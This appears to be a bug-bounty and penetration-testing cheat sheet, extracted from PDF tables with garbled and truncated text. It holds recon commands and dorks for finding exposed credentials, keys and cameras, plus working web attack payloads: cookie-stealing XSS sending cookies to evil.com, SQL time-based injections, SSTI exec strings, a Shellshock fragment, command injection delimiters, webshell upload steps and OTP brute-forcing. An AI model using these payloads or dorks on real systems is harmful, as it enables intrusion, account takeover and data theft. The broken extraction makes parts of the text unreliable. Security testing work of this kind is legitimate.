Recon workflow
Horizontal & vertical Correlations
https://mxtoolbox.com/asn.aspx
https://viewdns.info/reversewhois
https://domaineye.com/
amass intel -org <company here="" name=""></company>
amass intel -asn <asn here="" number=""></asn>
amass intel -cidr <cidr here="" range=""></cidr>
amass intel -whois -d <domain here="" name=""></domain>
amass enum -passive -d <domain here="" name=""></domain>
https://github.com/danielmiessler/SecLists
Subdomain bruteforcing - https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056
https://github.com/internetwache/CT_subdomains
https://crt.sh/?q=%25.facebook.com
https://github.com/ghostlulzhacks/CertificateTransparencyLogs
gobuster dns -d starbucks.com -w subdomains.txt
https://github.com/infosec-au/altdns
A small list of these
resources can be found below:
Virus Total
Netcraft
DNSdumpster
Threat crowed
• Shodan
• Cencys
DNSdb
Pastebin
knockpy.py <domain here="" name=""></domain>
https://github.com/blechschmidt/massdns
finding aws endpoints, awskeys, urls, upload fields
https://github.com/incogbyte/jsearch
Google dorks
site: <third party="" vendor=""> <company name=""></company></third>
site:pastebin.com "Company Name"
site:*.atlassian.net "Company Name"
site:bitbucket.org "Company Name"
Inurl:gitlab "Company Name"
https://pentest-tools.com/information-gathering/google-hacking#
Shodan dorks
net:<"CIDR,CIDR,CIDR">
org:<"Organization Name">

ssl:<"ORGANIZATION NAME">
Censys - https://censys.io/ipv4
waf - https://github.com/EnableSecurity/wafw00f
Wafw00f <url here=""></url>
wafbypass - https://github.com/0xInfection/Awesome-WAF#known-bypasses
subdomaintakeover - https://github.com/haccer/subjack
https://github.com/EdOverflow/can-i-take-over-xyz
github dorks - https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt
Aws s3
s3bucket dorks - site:.s3.amazonaws.com "Starbucks"
https://github.com/ghostlulzhacks/s3brute
python amazon-s3-enum.py -w BucketNames.txt -d <domain here=""></domain>
Google cloud storage
https://github.com/RhinoSecurityLabs/GCPBucketBrute
python3 gcpbucketbrute.py -k <domain here=""> -u</domain>
Digital ocean spaces
site:digitaloceanspaces.com <domain here=""></domain>
https://github.com/appsecco/spaces-finder
Unauthenticated Elasticsearch DB
port "9200" elastic [;shodan query]
Exposed Docker api
product:docker [;shodan query]
Kubernetes API
unauthenticated REST API on port 10250
product:"kubernetes"
Gitdumper (.git) - https://github.com/internetwache/GitTools/tree/master/Dumper
Subversion (.svn)- https://github.com/anantshri/svn-extractor
Exploitation CMS
Wordpress - https://github.com/wpscanteam/wpscan
Joomla - https://github.com/rezasp/joomscan
Drupal - https://github.com/droope/droopescan

adobe aem - https://github.com/0ang3el/aem-hacker	
Magento - https://github.com/steverobbins/magescan	
JRLSCAN	
nttps://urlscan.io/	
nttps://rapiddns.io	
https://sitereview.bluecoat.com/#/	
Security Tools	
nttps://tools.tldr.run/	

	TBHMv4 notes	The Bug Hunter's Methodology v4.0 - Recon Edition by @jhaddix #NahamCon2020!						
	Techniques Acquisitions	Tools Used/Website used crunchbase						
	Acquisitions	1) ASN lookup						
	ACM	2) Metabigor						
2	ASN enumeration	Amass intel -asn asnnumber whoxy.com						
3	Reverse whois	1) wnoxy.com 2) Domlink	Mission					
	Ad/Analytics/technology identifying	builtwith.com						
		copyright text	Wide Recon is the	art of discover	ing as many	assets re	elated to a target as po	ssible.
5	Google-FU	terms of service text privacy policy text	Make sure your so				siated to a target as po	ooibic.
	Shodan - Captures response data, cert data, stack	privacy policy text		-,,	9			
	profiling data & more	Use Shodan membership api to fetch more info						
	Finding Subdomains Linked & Js discovery	Burpsuite Pro	Scope Domains	Acquisition	ns Enur	ASN neration	Other	
1	Linked & Js discovery	With burpsuite pro					Vuins:	
		1) turn off passive					Vuins: Subdomain Takeover Buckets Github leaks	
		2) set forms auto submit	Reverse	Subdomai		⊃ort '	Rutomation/Helper: Interlace	
		set scope, keywords browse main site	WHOIS	Enumeration	on An	alysis	Screenshotting Frameworks	
		5) spider all hosts						
		6) target ->scope -> advance scope control -> add host or						
		iprange 7) show only scope items						
		8) select all hosts -> engagement tools -> analyze target -> save						
		report as html file						
		Gospider & hakrawler						
	other tools used	Sospider de Haktawiei						
	Subdomain & Scraping	Subdomain enumeration with Subdomainizer 1) find subdomains referenced is files						
		find subdomains referenced js files find cloud services referenced js files						
		3) use Shannon Entropy formula to find potentially sensitive						
,		items in js files						
2	if your just looking for subdomains	use subscraper						
	, ,	Censys, Robtex, waybackmachine, dnsdumpster, PTRarchive.com						
	Finding Infrastructure sources	netcraft, DNSDB search, Passivetotal etc						
	Search sources	yahoo, google, baidu, bing,ask, dogpile etc						
	Certificate sources	crt.sh, certspotter, certdb etc hackertarget, security trails, virustotal, fsecure riddler,						
	Security Sources	threatcrowd, threatminer etc						
		site:twithc.tv -www.twitch.tv						
	Scraning with google	site:twithc.tv -www.twitch.tv -watch.twitch.tv						
	Scraping with google Scraping with Amass	site:twithc.tv -www.twitch.tv -watch.twitch.tv -dev.twitch.tv amass -d twitch.tv						
	Scraping with Subfinder v2	subfinder -d hackerone.com -v						
		python3 github-subdomains.py -t "githubpersonalaccounttoken"						
	Scraping with Stranger	-d twitch.tv > twitch.tv						
	Scraping with Shosubgo Scraping with Cloud Ranges	go run main.go -d twitch.tv -s "githubtoken" technique to monitor AWS, GCP, Azure for SSL						
	Scraping with Gloud hanges	comings to monitor Aves, GCI , Azure 101 331						
3	Subdomain bruteforcing							
		guessing for live subdomains with larget list of common						
		sudomains name tool: Massdns						
		amass enum -brute -d twitch.tv -src						
		amass enum -brute -d twitch.tv -rf resolvers.txt -w bruteforce.						
	Sudomain Bruteforce with Amass	list shuffledns -d hackerone.com -w words.txt -r resolvers-excellent.						
	Sudomain Bruteforce with shuffleDNS	txt						
		Subdomain Bruting lists -> tomnomnom - githubrepo -> all.txt						
		Asset note -> commonspeak2						
		altdns dev1.company.com						
		dev2.company.com						
		dev-1.company.com						
	Alteration scanning							
4	Portanalysis & Service Analysis							
	Portanalysis - Massscan	massscan -p1-65535 ipmax-rate 1800 -oG outputfile.txt						
	Portanalysis - Dnmasscan	dnmasscan outputfile.txt dns.log -p80,443 -oG masscan.log						
	Consider searning Protessario	scan the remote administration protocls for default passwords						
	Service scanning - Brutespray	which takes nmap OG file format Massscan -> nmapservice scan -oG -> brutespray credential						
		bruteforce						
		tool: github-search github dork collections -> jhaddix github repo						
		fullmode on github and sensitive data exposure by						
5	Github dorking	@th3g3ntelmans video in bugcrowd						
_								
6	Screenshotting	eyewitness, aquatone, httpscreenshot						
7	Sudomain takeover	can i takeover xyz - github repo						
′	Canoniali tarcover	CONTRACTOR AND SECTION TOPO						
	Sudomain takeover tools used	SubOver & nuclei						
		Extending tools (interlace) recon framework						

		The Bug Hunter's Methodology v4.0 - Recon Edition by			
	TBHMv4 notes	@jhaddix #NahamCon2020!			
S.NO	Techniques	Tools Used/Website used			
	C-tier - Frameworks - found in github repos	1) AdmiralGaust/bountyRecon 2) offhoursscoding/recon 3) Samballox/recon-tools 4) JoshuaMart/Autorecon 6) yourbuddy25/Hunter 7) ultimate_recon.sh 8) https://gist.github. com/dwisswant05f647e3d406b5e984e6d69d3538968cd			
	B-tier frameworks - found in github repos	1) capt-meelo/LazyRecon 2) phspade/Automated-Scanner 3) shmilytty/OneForAll 4) SolomonSklash/chomp-scan 5) TypeError/domained 6) Screetsec/Sudomy 7) devanshbatham/Gorecon 8) LordNeoStark/tugarecon			
	A-tier frameworks - Found in github repos	1) Edu4rdSHL/findomain 2) SilverPoision/Rock-ON 3) epi052/recon-pipeline			
	S-tier frameworks - Found in github repos	1) Intrigue.io 2) AssetNote 3) spiderfoot 4) Project discovery framework - use https://chaos.projectdiscovery.io/#/ - download subdomains files of all public programs in hackerone & bugcrowd watch for new domains			
	Mindmaps	XMind - Mind Mapping Software			
	····idilaps	Vivillin - Ivillin Iviahhilik 2017.male			

		Google Dork Techn	ique	
Popular Google Dork				
operators	Details this dork will show you the cached version of any	Example	Github	
cache:	website searches for specific text contained on any web	cache: securitytrails.com	filename:.npmrc _auth	
allintext:	page	allintext: hacking tools	filename:.dockercfg auth	
allintitle:	exactly the same as allintext, but will show pages that contain titles with X characters	allintitle:"Security Companies"	extension:pem private	
allinurl:	it can be used to fetch results whose URL contains all the specified characters,	allinurl client area	extension:ppk private	
	used to search for any kind of file extensions, for example, if you want to search for jpg files you		filename:id_rsa or filename:	
filetype:	can use: this is exactly the same as allinurl, but it is only	filetype: jpg	id_dsa	
inurl:	useful for one single keyword	inurl: admin	extension:sql mysql dump	
intitle:	used to search for various keywords inside the title, for example,	intitle:secu	extension:sql mysql dump password	
rity tools	will search for titles beginning with "security" but "tools" can be somewhere else in the page		filename:credentials aws_access_key_id	
inanahar:	this is useful when you need to search for an exact anchor text used on any links,	inanahar:"aybar agayrity"	filename:.s3cfg	
inanchor:	useful to locate pages that contain certain	inanchor:"cyber security"		
intext	characters or strings inside their text, will show the list of web pages that have links to	intext:"safe internet"	filename:wp-config.php	
link:	the specified URL, will show you the full list of all indexed URLs for	link: microsoft.com	filename:.htpasswd	
site:	the specified domain and subdomain,	site:securitytrails.com	filename:.env DB_USERNAME NOT homestead	
	wildcard used to search pages that contain "anything" before your word, e.g. how to		filename:.env MAIL_HOST=smtp.	
*	this is a logical operator, e.g. "security" "tips" will	* a website,	gmail.com	
	show all the sites which contain "security" or "tips," or both words.	"security" "tips"	filename:.git-credentials	
Plus+	used to concatenate words, useful to detect pages that use more than one specific key,	security + trails		
	minus operator is used to avoiding showing results that contain certain words, e.g. security -trails will show pages that use "security" in their text, but not those			
Minus -	that have the word "trails." This will show a lot of results that include	security -trails		
Log files	username inside all *.log files	allintext:username filetype:log		
)/. l b b	The following Google Dork can be used to detect vulnerable or hacked servers that allow appending "/proc/self/cwd/" directly to the URL of your	i		
Vulnerable web servers	website. With the following dork, you'll be able to explore public FTP servers, which can often reveal	inurl:/proc/self/cwd		
Open FTP servers	interesting things.	intitle:"index of" inurl:ftp		
	.env files are the ones used by popular web development frameworks to declare general variables and configurations for local and online			
ENV files	dev environments. SSH private keys are used to decrypt information	site:xyz.com/.env		
SSH private keys	that is exchanged in the SSH protocol. In this case, we can use a simple dork to fetch	intitle:index.of id_rsa -id_rsa.pub		
Putty Logs	SSH usernames from PUTTY logs: we are going to fetch excel files which may	filetype:log username putty		
Email lists	contain a lot of email addresses.	filetype:xls inurl:"email.xls"		
	We filtered to check out only the .edu domain names and found a popular university with around 1800 emails from students and teachers	site:.edu filetype:xls inurl:"email.xls		
Live cameras	The following Google hacking techniques can help you fetch live camera web pages that are not restricted by IP.			
	Here's the dork to fetch various IP based cameras:	inurl:top.htm inurl:currenttime		
	To find WebcamXP-based transmissions: And another one for general live cameras:	intitle:"webcamXP 5"		
	if you're one of those classic individuals who still	inurl:"Ivappl.htm"		
MP3, Movie, and PDF files	download legal music, you can use this dork to find mp3 files: The same applies to legal free media files or PDF	intitle: index of mp3		
	documents you may need:	intitle: index of pdf intext: .mp4		
	we ran a dork that lets you fetch Weather Wing device transmissions. If you're involved in meteorology stuff or merely curious, check this			
Weather	out:	intitle:"Weather Wing WS-2"		

S.No	Vulnerability Name	Approach	Tool Used		
1	Privilege escalation	Horizontal (admin-admin & user to user)/Vertical Privilege	burpsuite		
	.0	escalaiton (User-admin)			
2	Privacy settings bugs		burpsuite		
		Check if session tokens/access tokens on			
		-Expires on logout			
3	Session bugs	-password reset/change -expires on user removal	burpsuite		
		-expires on changing roles			
		 insufficient session fixation - cookie editor extension used curl command to detect: curl http://site.com -H "Origin:http://evil. 			
		com" -l			
4	Insecure CORS misconfiguration	if it is access-allow-origin:* - not exploitable origin: evil.com	Corsy/burpsuite		
		origin: site.evil.com origin: null			
		if any site disclosing usernames & password, try cors exploit.			
		intercepting the victim request & generating csrf poc & sent to server as a attacker			
		- CSRF can be get or post based			
		- try in all state changing requests			
		use: jsfiddle.net online tool			
		check it validates orgin/referer if not csrf possible check it is cookie based authentication			
		if anticsrf tokens are there,, 1) remove anticsrf tokens & parameter			
5	CSRF	2) pass blank paramter	jsfiddle.net/burpsuite		
		add similar length token add another userss valid anti csrf token			
		5) random token in long length (aaaaaaaaa)			
		if content-type verfication 1) if no anitcsrf tokens are there			
		2) try content-type=text/plain flash csrf			
		check if any crossdomain policy			
		use swf json tool 1) inputvalue(try payload like "'batman()<>) reflected without xss			
		protection			
		2) xss validator - Intruder			
		host header injection through xss add referer: batman			
		hostheader: bing.com">script>alert(document.domain)<"			
		URL redirection through xss document.location.href="http://evil.com"			
		5) phishing through xss - iframe injection <iframe height="100" src="http://evil.com" width="100"></iframe>			
6	XSS	Cookie stealing through xss	xss validator/burpsuite		
		document.location.href="http://evil.com/p/?page="+document.cookie 7) file upload through xss			
		upload a picturefile, intercept it, change picturename.jpg to xss paylaod using intruder attack			
		8) remote file inclusion (RFI) through xss			
		php?=http://brutelogic.com.br/poc.svg - xsspayload 9) convert self xss to reflected one			
		copy response in a file.html -> it will work			
		10) xss through uri parameters site.com/about/xss"> <script></td><td></td><td></td><td></td></tr><tr><td></td><td></td><td>1) url redirection through host header (check url having 2xx, 3xx)</td><td></td><td></td><td></td></tr><tr><td></td><td></td><td>real host to bing.com X-forwarded-host: realweb.com</td><td></td><td></td><td></td></tr><tr><td>7</td><td>Host header injection</td><td>X-forwarded-host: bing.com 2) webcache poisoning through HHI</td><td>burpsuite</td><td></td><td></td></tr><tr><td></td><td></td><td>injection will be reflected in any buttons of page</td><td></td><td></td><td></td></tr><tr><td></td><td></td><td>host header attack on password reset page xss through HHI</td><td></td><td></td><td></td></tr><tr><td></td><td></td><td>1) common parameter list: dest, redirect, uri, path, continue, url, window, to,</td><td></td><td></td><td></td></tr><tr><td></td><td></td><td>out, view, dir, show, navigation, open, u, file, val, validate, domain, callback, return, page, feed, host, port, next,</td><td></td><td></td><td></td></tr><tr><td>8</td><td>URL redirection or open redirect</td><td>data, reference, site,</td><td>burpsuite</td><td></td><td></td></tr><tr><td></td><td></td><td>html 2) site.com/bing.com, site.com//bing.com, site.com/payloads</td><td></td><td></td><td></td></tr><tr><td>9</td><td>parameter tampering</td><td>ecommerce websites</td><td>burpsuite</td><td></td><td></td></tr><tr><td></td><td></td><td>get or post method input value reflecting back</td><td></td><td></td><td></td></tr><tr><td>10</td><td>HTML injection</td><td>3) <h1>adam</h1></td><td>burpsuite</td><td></td><td></td></tr><tr><td></td><td></td><td>4) url direction via html injection</td><td></td><td></td><td></td></tr><tr><td></td><td></td><td>1) LFI & RFI 2) LFI</td><td></td><td></td><td></td></tr><tr><td></td><td></td><td>any.com/index.php?reference=login.php</td><td></td><td></td><td></td></tr><tr><td></td><td></td><td>3) RFI any.com/?share=http://evil.com/</td><td></td><td></td><td></td></tr><tr><td>11</td><td>File inclusion</td><td>common parameter look on</td><td>lfisuite tool from aithub</td><td></td><td></td></tr><tr><td>11</td><td>File inclusion</td><td>file, document, folder, root, path, pg, style, pdf, template, php_path, doc dest, redirect, uri, path, continue, url, window, next, data, reference, site, html,</td><td>Ifisuite tool from github</td><td></td><td></td></tr><tr><td></td><td></td><td>val, validate, domain,</td><td></td><td></td><td></td></tr><tr><td></td><td></td><td>callback, return, page, feed, port, host, to, out, view, dir, show, navigation, open</td><td></td><td></td><td></td></tr><tr><td></td><td></td><td>4) Ifi - /var/www/html/ & /etc/passwd //etc/passwd</td><td></td><td></td><td></td></tr><tr><td>12</td><td>Missing spf, dmarc records</td><td>detecting - mxtoolbox.com</td><td>anonymousmail.me</td><td></td><td></td></tr><tr><td>14</td><td>missing spi, umaic records</td><td></td><td>https://emkei.cz/</td><td></td><td></td></tr></tbody></table></script>			

S.No	Vulnerability Name	Approach	Tool Used		
		making request from vulnereable application to target website			
		2) common paramters to look on			
		dest, redirect, uri, path, continue, url, window, next, data, reference, site, html,			
		val, validate, domain, callback, return, page, view, dir, show, file, document, folder, root, path, pg, style, pdf,			
		template, php_path, doc, feed, host,			
		port, to, out, navigation, open, result. 3) detection using https://www.expressvpn.com/what-is-my-ip & burp	burpcollabator/https://www.expressvpn.		
13	SSRF	collabator also used	com/what-is-my-ip		
		any.com/index/php?uri=http://external.com exploitation of ssrf (read file from server, scan the internal network, ssrf wih			
		rfi)			
		 read file from server - file:///identf- intruder on identifier- use lfi payloads scan the internal network - http://localhost:1 (changing the port number 			
		topcommonports like 21,22 etc) 7) ssrf with rfi - exceuting code from the external domain like (use hackoff.			
		html with xss script)			
		1) using https://github.			
14	Critical file found & Source code disclosure	com/danielmiessler/SecLists/tree/master/Discovery/Web-Content payloads	burpsuite		
		2) use dirsearch			
		1) if the website is not used by the target which is laying in any			
15		service provider. signingup on service provider like github, heroku, shopify, zendesk,	github.com/nahamsec/HostileSubBruteforcer		
		aws, tumblr etc to takeover domains			
		1) taking input as a command, reflecting output of that command			
		2) common parameters look on daemon, host, upload, dir, execute, download, log, ip, cli, cmd, filename,			
16	command injection	3) how to find cmdi: using delimiter list (like; ^&, &&, , , %0D, %0A, \n, <)	github.com/commixproject/commix.git		
		how to find - find a input field interacting with os shell by try with delimiter & shell commands	· · ·		
		6) ;dir, ;/etc/passwd			
		intercept - use clusterbomb- first parameter for delimeter & 2nd for command payloads			
		1) simple file upload - shell.php - fullcontrol of server - run			
		shellcommands			
17	fileupload vulnerability	github.com/fuzzdb-projects/fuzzdb/tree/master/attack/file- upload/malicious-images	github.com/almandin/fuxploider		
.,		3) pixel flood attack	gittiab.com/aimanam/taxpiolaci		
		4) content type verification			
		5) extension verification			
		 inputfiled - use xxe payloads in intruder to detect check website is accepting - content-type=text/xml header -> 			
		200ok	common places to find xxe		
		3) use online tool called pingb.in - check for external ping	 xml file uplaod (eg:config files) xml input fields 		
18	XXE Injection	4) for blind xxe - use python -m SimpleHTTPServer 80 5) SYSTEM "file:///etc/passwd" for local file read	3) xml based apis		
		6) SYSTEM "http://systemip/readinganyfile" - blind xxe	4) xml based files (rss, svg) Tool: pingb.		
		7) php:// to get RCE	in/burpsuite		
		8) use Gopher or other URI Handlers to exploit xxe			
		preventing from bruteforce attack intercept the login page with usercredentials with burp			
19		3) sent the request to sequencer	burpsuite		
15		4) or sent to intruder - make 1000 times request	burpsuite		
		5) do credential stuffings 6) the account needs to lock out for 30minutes to 24hrs			
		type of stored xss - attacker input saved in server - saved in			
		database			
		it wont be reflected			
		feedbackpage, chatapp,			
20	blind xss	ticket generation app, any app use moderation or updation, saving	burpsuite/Xsshunter.com		
		forms)			
		4) online tool used - xsshunter.com 5) copy the payload & paste it in input field			
		6) reflection will be found on xsshunter.com			
		7) multiple blind xss using intruder			
		intercept loginpage - pass long string of passwords or any quanity of input things			
24		the page will load slow	L		
21	Buffer overflow - web	- types of overflows - buffer, stack, heap, integer, format strin	burpsuite		
		follows 2) dos using buffer overflow - application dos attack			
		dos using buffer overflow - application dos attack wordpress, joomla, drupal, vbulletin, magento			
22		2) find vulnerable component in the cms	wpscan, cmsmap, cmsscan, joomscan, drupwn,		
		3) Search exploit in google	vbulletin scanner, mage scanner, owaspVBScan		
		scenario - 1 1) mostly found on user settings or profile management			
		two accounts required			
		3) intercept the request - change emailid of attacker			
23		4) logout	Burpsuite		
		5) try login with victim account - it wont work scenario - 2 - user moderation	·		
		1) find user id			
		2) replace attacker id instead of victim id			
		3) do functionality			
		password - hashing - process - resource consumption by cpu same like buffer overflow - but trying only in password field which			
		doesnt have			
24	Long password dos attack	password length	Burpsuite		
47	Long password dos attack	3) try to signup a account	barpaulte		
		4) give details intercept the request 5) give password more then the length - forward the request			

S.No	Vulnerability Name	Approach	Tool Used		
	Value ability Name	1) capture forgot password page or even any request into burpsuite	Tool Osea		
25	No rate limiting vulnerability - logical flow	2) sent to intruder 3) make 1000 times request	Burpsuite		
		4) it will affect both user & server 1) forget password page -> intercept in burpsuite			
26	Password reset poisiong	1) forget password page -> intercept in our psaile 2) host header attack 3) victim will receive emailed from the evilwebsite which mentioned in hostheader	Burpsuite		
		IDOR Browsing with account 1 https://acme.com/changepw/id?=1234			
	Broken Access control (Missing function	you can create a 2nd account and you get assinged https://acme.com/changepw/id?=5678 if you completely logout & loginto account #1 and issue the request	Common parameters		
27	level access control, IDOR, privilege escalation, authorizationbypass, business logic flaws, forceful browsing, parameter manipulation, path traversal, local file include)	with the uid from account #2, you may be able to change the accounts password. having to find users guids lower the priority a but, but look for other endpoints that might alow you to search for a user's guid Hash based IDOR - usedid sometime hased with base64 Local file inclusion, Path Traversal	id, user, account, number, order, no, doe, key, email, group, profile, edit numeric values functions lookon change email, change password, upgrade/downgrade user role, create/remove/update/delete context specific app data shipping, invoices and document viewing		
		GET /view?pg= termsandservices GET /view?pg=///etc/passwd%00			
		Missing function level access control			
		forceful browsing GET/admin/viewTransactions GET/ADMIN/viewTransactions			
		static files GET /patientIMAGES/3216647.jpg GET /patientDocuments/21714.pdf Direction function calling	Burpextension used: authmatrix, authz, autorize &		
		POST /admin/viewTransactions.ashx? admin=true&from=08032017&to=08032018 Parameter Manipulation & logic bugs	autorepeater		
		logic flow - ecommerce skipping steps on workflows ddfirst steps on workflows			
28	Account takeover via forget password page	additem>checkout->enter shippinginfo>payment 1) Intercept the forget password page 2) add X-Forwarded-Host: bing.com 3) forward the request	BurpSuite		
29	Broken Access Control	1)Create an account. 2) Change email id from A to B . 3) Now Generate forget password for email A. 4) Also try same concept on password also.	BurpSuite		
30	Rate Limiting bypass	1) Intercept the forget password page 2) Send to intruder 3) add X-	Burp Suite		
31	Lack of Password confirmation	Forwarded-Host: bing.com 4) Target to email 3) forward the request Required to delete account, change emailid,	Burp Suite		
32	2FA OR OTP Bypass	1)Go to registration section and fullfill all the requirement 2)Click to get code and intercept the request through burp proxy 3)Right click to request and send to intruder 4)Bruteforce 6 digit through burp intruder because no rate limit and other captcha verification or not implemented in get sms option 5) Analyze content length in burp intruder 6)After 1000 or more try attacker are able to bypass otp verification	Burpsuite		
33	Blind SQL Injection	or registration any mobile number without otp verification 1)Check input filed and inset payload like id=1 2) Inset in user-agent 3)Confirm change the time interval Note Payload: id=5+and+1=2 ',0)waitfor delay'0:0:05'- 1)if(now()=sysdate(),sleep(5),0)) 2()select(0)from(select(sleep(3)))v)/**+(select(3)from(select(sleep(3)))v)+**/ 3) 0*XOR(if(now()=sysdate(),sleep(3),0)XOR [*] 2	Burpsuite OR Cookie manager		
34	Remote Code Execution Vulnerability	4) ' and extractvalue(1,concat(0x0a,@@version)) or' 1)Go to target website xyz.com 2) Create an account and Verify email address 3)Go to xyz.com/setting/profile 4)In company logo upload malicious file/image e.g:RCE.php%00.gif and click on save. 5)Now left click on logo and view image 6) A new url will open and at the end of url add ?cmd=id as you can see id command sucessfully execute	Burpsuite OR Manually		
		Scanerio-2 1)Crawal your target using burp suite check for /cgi-bin/status 2)Send to repeater 3)Replace user-agent: {;;};echo \$(<td></td> <td></td> <td></td>			
35	Stealing Oauth Token	1)Login using 3rd party app like facebook,gmail 2)Intercept The request using burpsuite 3)Change redirect_url=bugbountypoc.com 4)In case fail change referer header parameter to bugbountypoc.com	Burpsuite		

S.No	Vulnerability Name	Approach	Tool Used
36	External Service Intraction	1)Capture the request using burp suite 2)Send to repeater 3)In host header replace realweb with burp collaborater payload OR add new header x-forwarded-for:burpcollaborater payload 4)Forward the request 5)Check burp collaborater response are able to perform dns lookup	Burpsuite
37	Server side Include Injection	1)Intercept the request using burp suite 2)Spider the target host 3)Search .shtml extension page 4)after finding these page input filed add payload #echo var="DATE_LOCAL" 5) Forward request and check in response	Burpsuite
38	Client and server Side Template injection	"1)Used toDisplay Dynamic Content on web page Hint: input reflect back then try to insert payload 2)Web Template enginewhich used this FreeMarker - Java-based template engine Velocity - Java-based template engine Smarty - PHP Template engine Twig - PHP Template engine Jade - Node.js Template engine Jinja2 - Python/Flask Template engine	g ww.target.com/page?name=John' www.target.com/page?name=John' www.target.com/page?name={(7*7})' iion tool for SSTI exploitation: n/epinna/tplmap d: {{7*7}} j"" %} elf.env.registerUndefinedFilterCallback(""exec"")}}{{_self.env.getFilter(""id"")}}"
39	Exif GeoLocation Data Not Stripped	1)Download Image Form https://github.com/ianare/exif-samples 2) Goto jpg > Gotp GPS > Download Picture > save Into PC 3) Upload Image on target website 4)Copy image url and paste into Tool (http://metapicz.com/)	exif.regex.info/exif.cgi
40	CRLF injection	0)Capture request using burpsuite 1)Insert arbitry data in input filed like=aaaaaaaaaaaa 2) If input reflect in response header its means that is vulnerable Carriage Return: %0A Linefeed: %0D 3)Add Payload like %0a%0dxxxxxxxxxxxx 4)After insert this payload if reflect response header with new line then add new cooke header 5)return_url= aaaa%0a%0dset-cookie:mycookie	Burpsuite
	Ecommerce bugs to test on	400.	
	Order management flaws	1) Price manipulation during order placement 2) Shipping address manipulation after order placement 3) Absence of mobile verification for cash-on-delivery orders 4) Getting cash back/refunds even when the order is canceled 5) Non-deduction of discounts, even after order cancellation 6) Using automation techniques to perform illegitimate ticket blocking for a certain period of time 7) Client-side validation bypass for maximum seat limit on a single order 8) Bookings/reservations using fake information 9) Usage of burner (disposable) phones for verification	
	, and the second	1) Coupon redemption, even after order cancellation 2) Bypass of a coupon's terms and conditions 3) Bypass of a coupon's validity 4) Use of multiple coupons for the same transaction 5) Predictable coupon codes	
32	Coupon and reward management flaws	Failure of a recomputation in coupon value after partial order cancellation Illegitimate use of coupons with other products	
33	Payment gateway integration flaws	Price modification at client-side with zero or negative values Price modification at client-side with varying price values Manipulating the contact URL Bypassing the third-party checksum Changing the price before the transaction is completed	
34	Content management system flaws	J Haws in transaction file management 2) Unusual activities involving role-based access control (RBAC), which regulates access to computer or network resources 3) Flaws within the customer notification system 4) Misuse of rich-text editor functionalities (which edit text within web browsers) 5) Flaws in third-party application program interfaces (APIs), which are used to create specialized web stores 6) Flaws in integration with point-of-sale (POS) devices	
35			

Payload	Result	Injection Statu	Description
{"email":"asd@a.com"}	{"code":2002,"status":200" message":"email vlaid."}	Vlaid	
{"email":"asd@a.com"}	{"code":2002,"status":200" message":bad formate."}	Not valid	
{"email":\"asd a\"@a.com"}	{"code":2002,"status":200" message":bad formate."}	Not valid	
{"email":"asd(a)@a.com"}	{"code":2002,"status":200" message":bad formate."}	Not valid	
{"email":"\"asd(a)\"@a.com"}	{"code":2002,"status":200" message":"email vlaid."}	Valid	
Email Verification Bypass	Lead To SQL Injection		
{"email":"asd'a@a.com"}	{"code":0,"status":500,"message":"Unspecified error"}	Not valid	
{"email":"asd'or'1'='1@a.com"}	{"code":2002,"status":200,"message":"Email is valid"}	Valid	
{"email":"a'-IF(LENGTH(database())>9,SLEEP(7),0)or'1'='1@a.com"}	{"code":2002,"status":200,"message":"Bad formate"}	Not valid	
{"email":"\"a'-IF(LENGTH(database())=9,SLEEP(7),0)or'1'='1\"@a.com"}	{"code":2002,"status":200,"message":"Email Sucess"]	Valid	Delay :7,854 milisecond
{"email":"\"a'-IF(LENGTH(database())=10,SLEEP(7),0)or'1'='1\"@a.com"}	{"code":2002,"status":200,"message":"Email Sucess"]	Valid	Delay :8,696 milisecond
{"email":"\"a'-IF(LENGTH(database())=11,SLEEP(7),0)or'1'='1\"@a.com"}	{"code":2002,"status":200,"message":"Email Sucess"]	Valid	No Delay
"OR 1=1 ""@example.com "mail"); DROP TABLE users;"@example.com	?	?	
Lead To Cross Si	ite Scripting		
" <script src='//xsshere?"@email.com</td'><td></td><td></td><td></td></tr><tr><td>test+(<script>alert(0)</script>)@example.com			
test@example(<script>alert(0)</script>).com			
" <script>alert(0)</script> "@example.com			
Template In	jection		
"<%= 7 * 7 %>"@example.com			
test+(\${{7*7}})@example.com			
SSRF Inje	ction		
john.doe@abc123.burpcollaborator.net (thanks @d0nutptr)			
john.doe@[127.0.0.1]			
Parameter P	ollution		
victim&email=attacker@example.com			
Email Header	injection		
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com			
"recipient@test.com>\r\nRCPT TO: <victim+"@test.com< td=""><td></td><td></td><td></td></victim+"@test.com<>			
Wildcard a	abuse		
%@example.com			
HTML injection	n in gmail		
inti.de.ceukelaire+(bold<u>underline<s>strike br/>newlinestrong^{sup>sub>sub)@gmail.com}</s></u>	n		
Bypassing strict e-mail validators three	ough SSO chains & integrations		
<script>alert(0)</script> init.de.offensiveapproach@gmail.com			Google:No Github:Yes Twitter No
Two Different Account Regis	ster Using Same Email		
Attacker@domain.com			1st account (Real Account)
Attacker@domain.com			2nd account(Fake Account)

Penetration testing checklist based	on OWASP Top 10 Mobile 2016	
M1. Improper Platform Usage	Test Name	Result
M1-01	Misuse of App permissions	Issue
M1-02	Insecure version of OS Installation Allowed	Issue
M1-03	Abusing Android Components through IPC intents ("exported" and "intent-filter")	Issue
M1-04	Misuse of Keychain , Touch ID and other security related controls	Issue
M1-05	Minimum Device Security Requirements absent	Issue
M1-06	Excessive port opened at Firewall	Issue
M1-07	Default credentials on Application Server	Issue
V11-08	Weak password policy Implementation	Issue
M1-09	Exposure of Webservices through WSDL document	Issue
M1-10	Security Misconfiguration on Server API	Issue
W1-11	Security Patching on Server API	Issue
M1-12	Input validation on API	Issue
M1-13	Information Exposure through API response message	Issue
M1-14	Control of interaction frequency on API (Replay Attack)	Issue
M2. Insecure Data Storage	Test Name	Result
M2-01	Unrestricted Backup file	Issue
M2-02	Unencrypted Database files	Issue
M2-03	Insecure Shared Storage	Issue
M2-04	Insecure Application Data Storage	Issue
M2-05	Information Disclosure through Logcat/Apple System Log (ASL)	Issue
M2-06	Application Backgrounding (Screenshot)	Issue
M2-07	Copy/Paste Buffer Caching	Issue
M2-08	Keyboard Press Caching	Issue
M3. Insecure Communication	Test Name	Result
M3-01	Insecure Transport Layer Protocols	Issue
M3-02	Use of Insecure and Deprecated algorithms	Issue
M3-03	Use of Disabling certificate validation	Issue
ИЗ-04	SSL pinning Implementation	Issue
M3-05	End-to-end encryption	Issue
M4. Insecure Authentication	Test Name	Result
